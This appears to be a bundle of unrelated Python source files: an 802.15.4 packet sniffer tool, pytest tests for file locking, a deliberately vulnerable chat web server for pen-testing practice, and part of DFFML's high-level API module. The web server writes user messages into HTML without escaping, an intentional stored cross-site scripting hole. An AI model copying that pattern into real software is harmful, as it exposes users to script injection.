opt_parser.add_option('--no-reset', action='store_true',
dest='no_reset', default=False)
opt_parser.add_option('--tap', action='store_true',
dest='tap', default=False)
opt_parser.add_option('--is-fifo', action='store_true',
dest='is_fifo', default=False)
opt_parser.add_option('--use-host-timestamp', action='store_true',
dest='use_host_timestamp', default=False)
return opt_parser.parse_args(args)
def sniffer_init(wpan_api, options):
"""" Send spinel commands to initialize sniffer node. """
wpan_api.queue_register(SPINEL.HEADER_DEFAULT)
wpan_api.queue_register(SPINEL.HEADER_ASYNC)
sys.stderr.write("Initializing sniffer...\n")
if not options.no_reset:
wpan_api.cmd_send(SPINEL.CMD_RESET)
time.sleep(1)
wpan_api.prop_set_value(SPINEL.PROP_PHY_ENABLED, 1)
result = wpan_api.prop_set_value(SPINEL.PROP_MAC_FILTER_MODE, SPINEL.MAC_FILTER_MODE_MONITOR)
if result is None:
return False
result = wpan_api.prop_set_value(SPINEL.PROP_PHY_CHAN, options.channel)
if result is None:
return False
result = wpan_api.prop_set_value(SPINEL.PROP_MAC_RAW_STREAM_ENABLED, 1)
if result is None:
return False
return True
FIFO_CHECK_INTERVAL = 0.1
def check_fifo(fifo):
if sys.platform == 'win32':
kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)
handle = msvcrt.get_osfhandle(fifo.fileno())
data = b''
p_data = ctypes.c_char_p(data)
written = ctypes.c_ulong(0)
while True:
time.sleep(FIFO_CHECK_INTERVAL)
if not kernel32.WriteFile(handle, p_data, 0, ctypes.byref(written), None):
error = ctypes.get_last_error()
if error in (
0xe8, # ERROR_NO_DATA
0xe9, # ERROR_PIPE_NOT_CONNECTED
):
os._exit(0)
else:
raise ctypes.WinError(error)
else:
while True:
time.sleep(FIFO_CHECK_INTERVAL)
try:
os.stat(fifo.name)
except OSError:
os._exit(0)
def main():
""" Top-level main for sniffer host-side tool. """
(options, remaining_args) = parse_args()
if options.debug:
CONFIG.debug_set_level(options.debug)
if options.use_host_timestamp:
print('WARNING: Using host timestamp, may be inaccurate', file=sys.stderr)
# Set default stream to pipe
stream_type = 'p'
stream_descriptor = "../../examples/apps/ncp/ot-ncp-ftd "+options.nodeid
if options.uart:
stream_type = 'u'
stream_descriptor = options.uart
elif options.socket:
stream_type = 's'
stream_descriptor = options.socket
elif options.pipe:
stream_type = 'p'
stream_descriptor = options.pipe
if options.nodeid:
stream_descriptor += " "+str(options.nodeid)
else:
if len(remaining_args) > 0:
stream_descriptor = " ".join(remaining_args)
stream = StreamOpen(stream_type, stream_descriptor, False, options.baudrate, options.rtscts)
if stream is None:
exit()
wpan_api = WpanApi(stream, options.nodeid)
result = sniffer_init(wpan_api, options)
if not result:
sys.stderr.write("ERROR: failed to initialize sniffer\n")
exit()
else:
sys.stderr.write("SUCCESS: sniffer initialized\nSniffing...\n")
pcap = PcapCodec()
hdr = pcap.encode_header(DLT_IEEE802_15_4_TAP if options.tap else DLT_IEEE802_15_4_WITHFCS)
if options.hex:
hdr = util.hexify_str(hdr)+"\n"
if options.output:
output = open(options.output, 'wb')
elif hasattr(sys.stdout, 'buffer'):
output = sys.stdout.buffer
else:
output = sys.stdout
output.write(hdr)
output.flush()
if options.is_fifo:
threading.Thread(target=check_fifo, args=(output,)).start()
epoch = datetime(1970, 1, 1)
timebase = datetime.utcnow() - epoch
timebase_sec = timebase.days * 24 * 60 * 60 + timebase.seconds
timebase_usec = timebase.microseconds
try:
tid = SPINEL.HEADER_ASYNC
prop_id = SPINEL.PROP_STREAM_RAW
while True:
result = wpan_api.queue_wait_for_prop(prop_id, tid)
if result and result.prop == prop_id:
length = wpan_api.parse_S(result.value)
pkt = result.value[2:2+length]
# metadata format (totally 19 bytes):
# 0. RSSI(int8)
# 1. Noise Floor(int8)
# 2. Flags(uint16)
# 3. PHY-specific data struct contains:
# 3.0 Channel(uint8)
# 3.1 LQI(uint8)
# 3.2 Timestamp in microseconds(uint64)
# 4. Vendor data struct contains:
# 4.0 Receive error(uint8)
if len(result.value) == 2+length+19:
metadata = wpan_api.parse_fields(result.value[2+length:2+length+19], "ccSt(CCX)t(i)")
timestamp = metadata[3][2]
timestamp_sec = timestamp / 1000000
timestamp_usec = timestamp % 1000000
# (deprecated) metadata format (totally 17 bytes):
# 0. RSSI(int8)
# 1. Noise Floor(int8)
# 2. Flags(uint16)
# 3. PHY-specific data struct contains:
# 3.0 Channel(uint8)
# 3.1 LQI(uint8)
# 3.2 Timestamp Msec(uint32)
# 3.3 Timestamp Usec(uint16)
# 4. Vendor data struct contains:
# 4.0 Receive error(uint8)
elif len(result.value) == 2+length+17:
metadata = wpan_api.parse_fields(result.value[2+length:2+length+17], "ccSt(CCLS)t(i)")
timestamp_usec = timebase_usec + metadata[3][2] * 1000 + metadata[3][3]
timestamp_sec = timebase_sec + timestamp_usec / 1000000
timestamp_usec = timestamp_usec % 1000000
# Some old version NCP doesn't contain timestamp information in metadata
else:
timestamp = datetime.utcnow() - epoch
timestamp_sec = timestamp.days * 24 * 60 * 60 + timestamp.seconds
timestamp_usec = timestamp.microseconds
if options.rssi:
sys.stderr.write("WARNING: failed to display RSSI, please update the NCP version\n")
if options.use_host_timestamp:
timestamp = round(time.time() * 1000000)
timestamp_sec = timestamp // 1000000
timestamp_usec = timestamp % 1000000
pkt = pcap.encode_frame(pkt, int(timestamp_sec), timestamp_usec, options.rssi, options.crc, metadata)
if options.hex:
pkt = util.hexify_str(pkt)+"\n"
output.write(pkt)
output.flush()
except KeyboardInterrupt:
pass
if wpan_api:
wpan_api.stream.close()
output.close()
if __name__ == "__main__":
main()
|
locking.py | import random
import time
from threading import Thread, Lock as ThreadingLock
from traceback import format_exc
import pytest
from ..helpers import daemonize
from ..platform import get_process_id, process_alive
from ..locking import TimeoutTimer, ExclusiveLock, Lock, LockRoster, \
ADD, REMOVE, SHARED, EXCLUSIVE, LockTimeout, NotLocked, NotMyLock
ID1 = "foo", 1, 1
ID2 = "bar", 2, 2
RACE_TEST_NUM_THREADS = 40
RACE_TEST_DURATION = 0.4 # seconds
@pytest.fixture()
def free_pid():
"""Return a free PID not used by any process (naturally this is racy)"""
host, pid, tid = get_process_id()
while True:
# PIDs are often restricted to a small range. On Linux the range >32k is by default not used.
pid = random.randint(33000, 65000)
if not process_alive(host, pid, tid):
return pid
class TestTimeoutTimer:
def test_timeout(self):
timeout = 0.5
t = TimeoutTimer(timeout).start()
assert not t.timed_out()
time.sleep(timeout * 1.5)
assert t.timed_out()
def test_notimeout_sleep(self):
timeout, sleep = None, 0.5
t = TimeoutTimer(timeout, sleep).start()
assert not t.timed_out_or_sleep()
assert time.time() >= t.start_time + 1 * sleep
assert not t.timed_out_or_sleep()
assert time.time() >= t.start_time + 2 * sleep
@pytest.fixture()
def lockpath(tmpdir):
return str(tmpdir.join('lock'))
class TestExclusiveLock:
def test_checks(self, lockpath):
with ExclusiveLock(lockpath, timeout=1) as lock:
assert lock.is_locked() and lock.by_me()
def test_acquire_break_reacquire(self, lockpath):
lock = ExclusiveLock(lockpath, id=ID1).acquire()
lock.break_lock()
with ExclusiveLock(lockpath, id=ID2):
pass
def test_timeout(self, lockpath):
with ExclusiveLock(lockpath, id=ID1):
with pytest.raises(LockTimeout):
ExclusiveLock(lockpath, id=ID2, timeout=0.1).acquire()
def test_kill_stale(self, lockpath, free_pid):
host, pid, tid = our_id = get_process_id()
dead_id = host, free_pid, tid
cant_know_if_dead_id = 'foo.bar.example.net', 1, 2
dead_lock = ExclusiveLock(lockpath, id=dead_id).acquire()
with ExclusiveLock(lockpath, id=our_id):
with pytest.raises(NotMyLock):
dead_lock.release()
with pytest.raises(NotLocked):
dead_lock.release()
with ExclusiveLock(lockpath, id=cant_know_if_dead_id):
with pytest.raises(LockTimeout):
ExclusiveLock(lockpath, id=our_id, timeout=0.1).acquire()
def test_migrate_lock(self, lockpath):
old_id, new_id = ID1, ID2
assert old_id[1] != new_id[1] # different PIDs (like when doing daemonize())
lock = ExclusiveLock(lockpath, id=old_id).acquire()
assert lock.id == old_id # lock is for old id / PID
old_unique_name = lock.unique_name
assert lock.by_me() # we have the lock
lock.migrate_lock(old_id, new_id) # fix the lock
assert lock.id == new_id # lock corresponds to the new id / PID
new_unique_name = lock.unique_name
assert lock.by_me() # we still have the lock
assert old_unique_name != new_unique_name # locking filename is different now
def test_race_condition(self, lockpath):
class SynchronizedCounter:
def __init__(self, count=0):
self.lock = ThreadingLock()
self.count = count
self.maxcount = count
def value(self):
with self.lock:
return self.count
def maxvalue(self):
with self.lock:
return self.maxcount
def incr(self):
with self.lock:
self.count += 1
if self.count > self.maxcount:
self.maxcount = self.count
return self.count
def decr(self):
with self.lock:
self.count -= 1
return self.count
def print_locked(msg):
with print_lock:
print(msg)
def acquire_release_loop(id, timeout, thread_id, lock_owner_counter, exception_counter, print_lock, last_thread=None):
print_locked("Thread %2d: Starting acquire_release_loop(id=%s, timeout=%d); lockpath=%s" % (thread_id, id, timeout, lockpath))
timer = TimeoutTimer(timeout, -1).start()
cycle = 0
while not timer.timed_out():
cycle += 1
try:
with ExclusiveLock(lockpath, id=id, timeout=timeout/20, sleep=-1): # This timeout is only for not exceeding the given timeout by more than 5%. With sleep<0 it's constantly polling anyway.
lock_owner_count = lock_owner_counter.incr()
print_locked("Thread %2d: Acquired the lock. It's my %d. loop cycle. I am the %d. who has the lock concurrently." % (thread_id, cycle, lock_owner_count))
time.sleep(0.005)
lock_owner_count = lock_owner_counter.decr()
print_locked("Thread %2d: Releasing the lock, finishing my %d. loop cycle. Currently, %d colleagues still have the lock." % (thread_id, cycle, lock_owner_count))
except LockTimeout:
print_locked("Thread %2d: Got LockTimeout, finishing my %d. loop cycle." % (thread_id, cycle))
except:
exception_count = exception_counter.incr()
e = format_exc()
print_locked("Thread %2d: Exception thrown, finishing my %d. loop cycle. It's the %d. exception seen until now: %s" % (thread_id, cycle, exception_count, e))
print_locked("Thread %2d: Loop timed out--terminating after %d loop cycles." % (thread_id, cycle))
if last_thread is not None: # joining its predecessor, if any
last_thread.join()
print('')
lock_owner_counter = SynchronizedCounter()
exception_counter = SynchronizedCounter()
print_lock = ThreadingLock()
thread = None
for thread_id in range(RACE_TEST_NUM_THREADS):
thread = Thread(target=acquire_release_loop, args=(('foo', thread_id, 0), RACE_TEST_DURATION, thread_id, lock_owner_counter, exception_counter, print_lock, thread))
thread.start()
thread.join() # joining the last thread
assert lock_owner_counter.maxvalue() > 0, 'Never gained the lock? Something went wrong here...'
assert lock_owner_counter.maxvalue() <= 1, "Maximal number of concurrent lock holders was %d. So exclusivity is broken." % (lock_owner_counter.maxvalue())
assert exception_counter.value() == 0, "ExclusiveLock threw %d exceptions due to unclean concurrency handling." % (exception_counter.value())
class TestLock:
def test_shared(self, lockpath):
lock1 = Lock(lockpath, exclusive=False, id=ID1).acquire()
lock2 = Lock(lockpath, exclusive=False, id=ID2).acquire()
assert len(lock1._roster.get(SHARED)) == 2
assert len(lock1._roster.get(EXCLUSIVE)) == 0
assert not lock1._roster.empty(SHARED, EXCLUSIVE)
assert lock1._roster.empty(EXCLUSIVE)
lock1.release()
lock2.release()
def test_exclusive(self, lockpath):
with Lock(lockpath, exclusive=True, id=ID1) as lock:
assert len(lock._roster.get(SHARED)) == 0
assert len(lock._roster.get(EXCLUSIVE)) == 1
assert not lock._roster.empty(SHARED, EXCLUSIVE)
def test_upgrade(self, lockpath):
with Lock(lockpath, exclusive=False) as lock:
lock.upgrade()
lock.upgrade() # NOP
assert len(lock._roster.get(SHARED)) == 0
assert len(lock._roster.get(EXCLUSIVE)) == 1
assert not lock._roster.empty(SHARED, EXCLUSIVE)
def test_downgrade(self, lockpath):
with Lock(lockpath, exclusive=True) as lock:
lock.downgrade()
lock.downgrade() # NOP
assert len(lock._roster.get(SHARED)) == 1
assert len(lock._roster.get(EXCLUSIVE)) == 0
def test_got_exclusive_lock(self, lockpath):
lock = Lock(lockpath, exclusive=True, id=ID1)
assert not lock.got_exclusive_lock()
lock.acquire()
assert lock.got_exclusive_lock()
lock.release()
assert not lock.got_exclusive_lock()
def test_break(self, lockpath):
lock = Lock(lockpath, exclusive=True, id=ID1).acquire()
lock.break_lock()
assert len(lock._roster.get(SHARED)) == 0
assert len(lock._roster.get(EXCLUSIVE)) == 0
with Lock(lockpath, exclusive=True, id=ID2):
pass
def test_timeout(self, lockpath):
with Lock(lockpath, exclusive=False, id=ID1):
with pytest.raises(LockTimeout):
Lock(lockpath, exclusive=True, id=ID2, timeout=0.1).acquire()
with Lock(lockpath, exclusive=True, id=ID1):
with pytest.raises(LockTimeout):
Lock(lockpath, exclusive=False, id=ID2, timeout=0.1).acquire()
with Lock(lockpath, exclusive=True, id=ID1):
with pytest.raises(LockTimeout):
Lock(lockpath, exclusive=True, id=ID2, timeout=0.1).acquire()
def test_kill_stale(self, lockpath, free_pid):
host, pid, tid = our_id = get_process_id()
dead_id = host, free_pid, tid
cant_know_if_dead_id = 'foo.bar.example.net', 1, 2
dead_lock = Lock(lockpath, id=dead_id, exclusive=True).acquire()
roster = dead_lock._roster
with Lock(lockpath, id=our_id):
assert roster.get(EXCLUSIVE) == set()
assert roster.get(SHARED) == {our_id}
assert roster.get(EXCLUSIVE) == set()
assert roster.get(SHARED) == set()
with pytest.raises(KeyError):
dead_lock.release()
with Lock(lockpath, id=cant_know_if_dead_id, exclusive=True):
with pytest.raises(LockTimeout):
Lock(lockpath, id=our_id, timeout=0.1).acquire()
def test_migrate_lock(self, lockpath):
old_id, new_id = ID1, ID2
assert old_id[1] != new_id[1] # different PIDs (like when doing daemonize())
lock = Lock(lockpath, id=old_id, exclusive=True).acquire()
assert lock.id == old_id
lock.migrate_lock(old_id, new_id) # fix the lock
assert lock.id == new_id
lock.release()
lock = Lock(lockpath, id=old_id, exclusive=False).acquire()
assert lock.id == old_id
lock.migrate_lock(old_id, new_id) # fix the lock
assert lock.id == new_id
lock.release()
@pytest.fixture()
def rosterpath(tmpdir):
return str(tmpdir.join('roster'))
class TestLockRoster:
def test_empty(self, rosterpath):
roster = LockRoster(rosterpath)
empty = roster.load()
roster.save(empty)
assert empty == {}
def test_modify_get(self, rosterpath):
roster1 = LockRoster(rosterpath, id=ID1)
assert roster1.get(SHARED) == set()
roster1.modify(SHARED, ADD)
assert roster1.get(SHARED) == {ID1, }
roster2 = LockRoster(rosterpath, id=ID2)
roster2.modify(SHARED, ADD)
assert roster2.get(SHARED) == {ID1, ID2, }
roster1 = LockRoster(rosterpath, id=ID1)
roster1.modify(SHARED, REMOVE)
assert roster1.get(SHARED) == {ID2, }
roster2 = LockRoster(rosterpath, id=ID2)
roster2.modify(SHARED, REMOVE)
assert roster2.get(SHARED) == set()
def test_kill_stale(self, rosterpath, free_pid):
host, pid, tid = our_id = get_process_id()
dead_id = host, free_pid, tid
# put a dead local process lock into roster
roster1 = LockRoster(rosterpath, id=dead_id)
roster1.kill_stale_locks = False
assert roster1.get(SHARED) == set()
roster1.modify(SHARED, ADD)
assert roster1.get(SHARED) == {dead_id}
# put a unknown-state remote process lock into roster
cant_know_if_dead_id = 'foo.bar.example.net', 1, 2
roster1 = LockRoster(rosterpath, id=cant_know_if_dead_id)
roster1.kill_stale_locks = False
assert roster1.get(SHARED) == {dead_id}
roster1.modify(SHARED, ADD)
assert roster1.get(SHARED) == {dead_id, cant_know_if_dead_id}
killer_roster = LockRoster(rosterpath)
# Active kill_stale_locks here - does it kill the dead_id lock?
assert killer_roster.get(SHARED) == {cant_know_if_dead_id}
killer_roster.modify(SHARED, ADD)
assert killer_roster.get(SHARED) == {our_id, cant_know_if_dead_id}
other_killer_roster = LockRoster(rosterpath)
# Active kill_stale_locks here - must not kill our_id lock since we're alive.
assert other_killer_roster.get(SHARED) == {our_id, cant_know_if_dead_id}
def test_migrate_lock(self, rosterpath):
old_id, new_id = ID1, ID2
assert old_id[1] != new_id[1] # different PIDs (like when doing daemonize())
roster = LockRoster(rosterpath, id=old_id)
assert roster.id == old_id
roster.modify(SHARED, ADD)
assert roster.get(SHARED) == {old_id}
roster.migrate_lock(SHARED, old_id, new_id) # fix the lock
assert roster.id == new_id
assert roster.get(SHARED) == {new_id}
|
VulnerableWebServer.py | import socket, threading, sys
class WebServer:
def __init__(self):
self.logo()
self.valid = False
try:
self.ip = sys.argv[1]
self.port = int(sys.argv[2])
try:
self.externalip = sys.argv[3]
except:
self.externalip = self.ip
self.valid = True
except Exception as e:
print("[+] Invalid Arguments!\n[+] Usage: python3 VulnerableServer.py <ip> <port> <externalip>\n[+] Note: The External IP argument is optional.")
if self.valid:
try:
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.bind((self.ip, self.port))
self.msgs = []
self.packet = self.gen_packet()
print(f"[+] Vulnerable Web Server Started on: {self.ip}:{self.port}")
except Exception as e:
print(f"[+] Server Cannot be started due to Error: {e}")
self.valid = False
def logo(self=None):
print("""
__ __ _____ _____ __ __ _ _ _ _____ __ _____
\ \ / // ____/ ____| \ \ / / | | | | | | / ____| /_ | | ____|
\ V /| (___| (___ _____\ \ / / _| |_ __ ___ _ __ __ _| |__ | | ___| (___ ___ _ ____ __ __ _| | | |__
> < \___ \ ___ \______\ \/ / | | | | '_ \ / _ \ '__/ _` | '_ \| |/ _ \ ___ \ / _ \ '__\ \ / / \ \ / / | |___ \
/ . \ ____) |___) | \ /| |_| | | | | | __/ | | (_| | |_) | | __/____) | __/ | \ V / \ V /| |_ ___) |
/_/ \_\_____/_____/ \/ \__,_|_|_| |_|\___|_| \__,_|_.__/|_|\___|_____/ \___|_| \_/ \_/ |_(_)____/
Vulnerable Web-Server Made for Pen-Testing By DrSquid
""")
def gen_packet(self):
packet = f"""
<title>Vulnerable Web Server</title>
<h1>Horrific Looking Chat Server</h1>
This is an anonoymous Chat Site.
The Server is also made to be vulnerable to Cross site scripting attacks.
<form action="http://{self.externalip}:{self.port}">
<textarea name="msg" cols="50" rows="10" placeholder="Enter your message here."></textarea>
<h1></h1>
<input type="submit" value="Send Message">
</form>
"""
for i in self.msgs:
packet += f"<h5>Anonoymous: {i}</h5>\n"
return packet
def listen(self):
if self.valid:
print("[+] Server is listening For Connections.....")
while True:
ipaddr = ""
self.server.listen()
conn, ip = self.server.accept()
self.packet = self.gen_packet()
msg = conn.recv(1024).decode()
item = 0
msg_split = msg.split()
for i in msg_split:
if 'x-forwarded-for' in i.lower():
ipaddr = msg_split[item + 1]
break
item += 1
if ipaddr == "":
ipaddr = ip[0]
handler = threading.Thread(target=self.handler, args=(conn, msg, ipaddr))
handler.start()
def handler(self, conn, msg, ip):
try:
conn.send('HTTP/1.0 200 OK\n'.encode())
conn.send('Content-Type: text/html\n'.encode())
if "/?msg=" in msg.split()[1]:
try:
main_msg = str(msg).split()[1].split("=")[1].replace("+", " ").replace("%3C", "<").replace("%3E",">").replace(
"%2F", "/").replace("%22", '"').replace("%27", "'").replace("%3D", "=").replace("%2B","+").replace(
"%3A", ":").replace("%28", "(").replace("%29", ")").replace("%2C", ",").replace("%3B",";").replace(
"%20", " ").replace("%3F", "?").replace("%5C","\\").replace("%7B", "{").replace("%7D","}").replace(
"%24", "$").replace("%0D", "\n").replace("%0A", " ").replace("%40","@")
if main_msg.strip() != "":
print(f"[+] {ip}: {main_msg}")
self.msgs.append(main_msg)
self.packet = self.gen_packet()
except:
pass
conn.send(self.packet.encode())
conn.close()
except:
pass
serv = WebServer()
serv.listen()
|
high_level.py | """
High level abstraction interfaces to DFFML. These are probably going to be used
in a lot of quick and dirty python files.
"""
import asyncio
import pathlib
from typing import Optional, Tuple, List, Union, Dict, Any, AsyncIterator
from .record import Record
from .df.types import DataFlow, Input
from .df.memory import MemoryOrchestrator
from .source.source import Sources, BaseSource
from .source.memory import MemorySource, MemorySourceConfig
from .df.base import BaseInputSetContext, BaseOrchestrator, BaseInputSet
def _records_to_sources(*args):
"""
Create a memory source out of any records passed as a variable length list.
Add all sources found in the variable length list to a list of sources, and
the created source containing records, and return that list of sources.
"""
# If the first arg is an instance of sources, append the rest to that.
if args and isinstance(args[0], Sources):
sources = args[0]
else:
sources = Sources(
*[arg for arg in args if isinstance(arg, BaseSource)]
)
# Records to add to memory source
records = []
# Make args mutable
args = list(args)
# Convert dicts to records
for i, arg in enumerate(args):
if isinstance(arg, dict):
arg = Record(i, data={"features": arg})
if isinstance(arg, Record):
records.append(arg)
if isinstance(arg, str) and "." in arg:
filepath = pathlib.Path(arg)
source = BaseSource.load(filepath.suffix.replace(".", ""))
sources.append(source(filename=arg))
# Create memory source if there are any records
if records:
sources.append(MemorySource(MemorySourceConfig(records=records)))
return sources
async def run(
dataflow: DataFlow,
*input_sets: Union[List[Input], BaseInputSet],
orchestrator: Optional[BaseOrchestrator] = None,
strict: bool = True,
ctx: Optional[BaseInputSetContext] = None,
halt: Optional[asyncio.Event] = None,
) -> AsyncIterator[Tuple[BaseInputSetContext, Dict[str, Any]]]:
"""
Run a DataFlow
Run a DataFlow using the the default orchestrator
(:py:class:`MemoryOrchestrator <dffml.df.memory.MemoryOrchestrator>`),
or the specified one.
Parameters
----------
dataflow : DataFlow
:py:class:`DataFlow <dffml.df.types.DataFlow>` to run.
input_sets : InputSet, list, dict, optional
:py:class:`Inputs <dffml.df.types.Input>` to give to the
:py:class:`DataFlow <dffml.df.types.DataFlow>` when it starts. Can be in
multiple formats.
If each element is a ``list`` then it's expected that each element of
that list be an :py:class:`Input <dffml.df.types.Input>`, in this case
an :py:class:`InputSet <dffml.df.base.BaseInputSet>` will be created
with a random string used as the
:py:class:`StringInputSetContext <dffml.df.base.StringInputSetContext>`.
If a ``dict`` is given then each key will become a
:py:class:`StringInputSetContext <dffml.df.base.StringInputSetContext>`.
The value for each key should be a ``list`` of
:py:class:`Input <dffml.df.types.Input>` objects.
If each element is a :py:class:`InputSet <dffml.df.base.BaseInputSet>`
then each context
:py:class:`InputSetContext <dffml.df.base.BaseInputSetContext>`
will have its respective :py:class:`Inputs <dffml.df.types.Input>` added
to it.
orchestrator : BaseOrchestrator, optional
Orchestrator to use, defaults to
:py:class:`MemoryOrchestrator <dffml.df.memory.MemoryOrchestrator>`
if ``None``.
strict : bool, optional
If true (default), raise exceptions when they occur in operations. If
false, log exceptions without raising.
ctx : BaseInputSetContext, optional
If given and input_sets is a ``list`` then add inputs under the given
context. Otherwise they are added under randomly generated contexts.
halt : Event, optional
If given, keep the dataflow running until this :py:class:`asyncio.Event`
is set.
Returns
-------
asynciterator
``tuple`` of
:py:class:`InputSetContext <dffml.df.base.BaseInputSetContext>`
and ``dict`` where contents are determined by output operations.
If multiple output operations are used, then the top level keys will be
the names of the output operations. If only one is used, then the
``dict`` will be whatever the return value of that output operation was.
Examples
--------
The following creates a TCP echo server. We write an operation which using a
DataFlow to open a connection and send a message to the server.
For the inputs to the DataFlow, we create 2 Input objects whose values are
the message to be sent to the TCP server. We also create Input objects for
the host and port. When running a DataFlow, operations will be run with each
possible permutation of their inputs.
.. TODO Autogenerate this image during docs build
graph LR
send_to_server
1[First echo message]
port[Port]
host[Host]
2[Second echo message]
1_c[Host, Port, First echo]
2_c[Host, Port, Second echo]
host --> 1_c
port --> 1_c
2 --> 2_c
port --> 2_c
host --> 2_c
1 --> 1_c
1_c --> send_to_server
2_c --> send_to_server
.. image:: /images/high_level_run_echo_server_input_combination.svg
:alt: Flow chart showing how both echo messages create a parameter set including that echo message and the host and port
Because there is a different Input object for each of the 2 "echo" messages,
one will get combined with the host and port to make an argument list for
the ``send_to_server`` operation. The other also combines with the host and
port to make another argument list. Both argument lists are used to call the
``send_to_server`` operation.
>>> # Socket server derived from
>>> # https://docs.python.org/3/library/socketserver.html#asynchronous-mixins
>>> import asyncio
>>> import threading
>>> import socketserver
>>> from dffml import *
>>>
>>> class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
... def handle(self):
... self.request.sendall(self.request.recv(1024))
>>>
>>> class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
... pass
>>>
>>> @op
... async def send_to_server(host: str, port: int, message: str):
... reader, writer = await asyncio.open_connection(host, port)
...
... writer.write(message.encode())
... await writer.drain()
...
... data = await reader.read(100)
... print(f"Client sent {message!r}, got: {data.decode()!r}")
...
... writer.close()
... await writer.wait_closed()
>>>
>>> # List of messages to send to the server, 2 long, each value is "echo"
>>> messages = [Input(value="echo", definition=send_to_server.op.inputs["message"])
... for _ in range(0, 2)]
>>>
>>> # DataFlow consisting of the single operation
>>> dataflow = DataFlow.auto(send_to_server)
>>>
>>> async def main():
... # Create a server with and pass 0 to get a random port assigned
... server = ThreadedTCPServer(("127.0.0.1", 0), ThreadedTCPRequestHandler)
... with server:
... host, port = server.server_address
...
... # Start a thread to run the server in the background
... server_thread = threading.Thread(target=server.serve_forever)
... # Exit the server thread when the main thread terminates
... server_thread.daemon = True
... server_thread.start()
...
... # Add the host and port to the list of Inputs for the DataFlow
... inputs = messages + [
... Input(value=host, definition=send_to_server.op.inputs["host"]),
... Input(value=port, definition=send_to_server.op.inputs["port"])
... ]
...
... try:
... async for ctx, results in run(dataflow, inputs):
... pass
... finally:
... server.shutdown()
>>>
>>> asyncio.run(main())
Client sent 'echo', got: 'echo'
Client sent 'echo', got: 'echo'
"""
if orchestrator is None:
orchestrator = MemoryOrchestrator.withconfig({})
async with orchestrator:
async with orchestrator(dataflow) as ctx:
async for ctx, results in ctx.run(*input_sets):
yield ctx, results
async def save(source: BaseSource, *args: Record) -> None:
"""
Update a source's knowledge about given records.
For each record given, call
:py:func:`update <dffml.source.source.BaseSourceContext.update>` on the
source. Effectively saving all the records to the source.
Parameters
----------
source : BaseSource
Data source to use. See :doc:`/plugins/dffml_source` for sources and
options.
*args : list
Records to be saved.
Examples
--------
>>> import asyncio
>>> import pathlib
>>> from dffml import *
>>>
>>> source = CSVSource(filename="save.csv", allowempty=True, readwrite=True)
>>>
>>> async def main():
... await save(
... source,
... Record(
... "myrecord",
... data={
... "features": {"Years": 0, "Expertise": 1, "Trust": 0.1},
... "prediction": {"Salary": {"value": 10, "confidence": 1.0}},
... }
... )
... )
... print(pathlib.Path("save.csv").read_text().strip())
>>>
>>> asyncio.run(main())
key,tag,Expertise,Trust,Years,prediction_Salary,confidence_Salary
myrecord,untagged,1,0.1,0,10,1.0
"""
async with source:
async with source() as sctx:
for record in args:
await sctx.update(record)
async def load(source: BaseSource, *args: str) -> AsyncIterator[Record]:
"""
Yields records from a source.
Yields all the records from the source, if record keys are given then only
those records are yielded.
Parameters
----------
source : BaseSource
Data source to use. See :doc:`/plugins/dffml_source` for sources and
options.
*args : str
Records to be returned. If empty, all the records in a source will be returned.
Returns
-------
asynciterator
:py:class:`Record <dffml.record.Record>` object
Examples
--------
>>> import asyncio
>>> from dffml import *
>>>
>>> source = CSVSource(filename="load.csv", allowempty=True, readwrite=True)
>>>
>>> async def main():
... await save(
... source,
... Record("1", data={"features": {"A": 0, "B": 1}}),
... Record("2", data={"features": {"A": 3, "B": 4}}),
... )
...
... # All records in source
... async for record in load(source):
... print(record.export())
...
... # For specific records in a source
... async for record in load(source, "1"):
... print(record.export())
>>>
>>> asyncio.run(main())
{'key': '1', 'features': {'A': 0, 'B': 1}, 'extra': {}}
{'key': '2', 'features': {'A': 3, 'B': 4}, 'extra': {}}
{'key': '1', 'features': {'A': 0, 'B': 1}, 'extra': {}}
"""
async with source:
async with source() as sctx:
if args:
# If specific records are to be loaded
for record in args:
yield await sctx.record(record)
else:
# All the records are loaded
async for record in sctx.records():
yield record
async def train(model, *args: Union[BaseSource, Record, Dict[str, Any]]):
"""
Train a machine learning model.
Provide records to the model to train it. The model should be already
instantiated.
Parameters
----------
model : Model
Machine Learning model to use. See :doc:`/plugins/dffml_model` for
models options.
*args : list
Input data for training. Could be a ``dict``, :py:class:`Record`,
filename, one of the data :doc:`/plugins/dffml_source`, or a filename
with the extension being one of the data sources.
Examples
--------
>>> import asyncio
>>> from dffml import *
>>>
>>> model = SLRModel(
... features=Features(
... Feature("Years", int, 1),
... ),
... predict=Feature("Salary", int, 1),
... directory="tempdir",
... )
>>>
>>> async def main():
... await train(
... model,
... {"Years": 0, "Salary": 10},
... {"Years": 1, "Salary": 20},
... {"Years": 2, "Salary": 30},
... {"Years": 3, "Salary": 40},
... )
>>>
>>> asyncio.run(main())
"""
sources = _records_to_sources(*args)
async with sources as sources, model as model:
async with sources() as sctx, model() as mctx:
return await mctx.train(sctx)
async def accuracy(
model, *args: Union[BaseSource, Record, Dict[str, Any]]
) -> float:
"""
Assess the accuracy of a machine learning model.
Provide records to the model to assess the percent accuracy of its
prediction abilities. The model should be already instantiated and trained.
Parameters
----------
model : Model
Machine Learning model to use. See :doc:`/plugins/dffml_model` for
models options.
*args : list
Input data for training. Could be a ``dict``, :py:class:`Record`,
filename, one of the data :doc:`/plugins/dffml_source`, or a filename
with the extension being one of the data sources.
Returns
-------
float
A decimal value representing the percent of the time the model made the
correct prediction. For some models this has another meaning. Please see
the documentation for the model your using for further details.
Examples
--------
>>> import asyncio
>>> from dffml import *
>>>
>>> model = SLRModel(
... features=Features(
... Feature("Years", int, 1),
... ),
... predict=Feature("Salary", int, 1),
... directory="tempdir",
... )
>>>
>>> async def main():
... print(
... "Accuracy:",
... await accuracy(
... model,
... {"Years": 4, "Salary": 50},
... {"Years": 5, "Salary": 60},
... ),
... )
>>>
>>> asyncio.run(main())
Accuracy: 1.0
"""
sources = _records_to_sources(*args)
async with sources as sources, model as model:
async with sources() as sctx, model() as mctx:
return float(await mctx.accuracy(sctx))
async def predict(
model,
*args: Union[BaseSource, Record, Dict[str, Any]],
update: bool = False,
keep_record: bool = False,
):
"""
Make a prediction using a machine learning model.
The model must be trained before using it to make a prediction.
Parameters
----------
model : Model
Machine Learning model to use. See :doc:`/plugins/dffml_model` for
models options.
*args : list
